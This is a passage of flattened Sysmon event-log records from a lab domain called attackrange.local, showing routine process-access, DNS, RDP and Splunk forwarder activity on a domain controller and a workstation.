Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13BF5E58AC8D20AD0C4A45A8ABB723F1,SHA256=261BBCE12189E467719CE804112DDABE5249BCA94E310A044D4B445ABE4A2282,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057837Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:04.331{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54772- 10341000x80000000000000001057836Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057835Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057834Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057833Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057832Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057831Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057830Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057829Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057828Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057827Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057826Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057825Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057824Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057823Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057822Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057821Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057820Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057819Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057818Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057817Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057816Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057815Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057814Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057813Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057812Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057811Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057810Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057809Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.411{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001057841Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:07.896{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7492B1822CA32BD98761BDF723F8ADF,SHA256=70B07FB207622807A6D037AF466BA3EB493AE262E04CB04ECDB5C2401EB9FD7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982144Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:07.552{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=288738DAE398F72EC7ACBB69ACDF176D,SHA256=62A103DCA0170087E8BC24B79D1422C2DFD7D4C3D2C3CB1D3E9895AA33F2D013,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057840Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:05.342{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.97-60920-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057839Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:07.021{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7098118D0CD63BD85FB9BFB518643F9C,SHA256=58B4E3EA684F31A3ADB588D0C38E8CF29870F25C6C546BA2B2A1DE80514EEB5A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982143Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:03.875{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59590-false10.0.1.12-8000- 23542300x80000000000000001057844Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:08.927{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B7ADB51DE47D290C3ABDB9CA271A9B4,SHA256=0EB2311B6D6648481034DC88E1B7901F13DDF915D89D8971522FDF9A9F6DA485,IMPHASH=00000000000000000000000000000000falsetrue 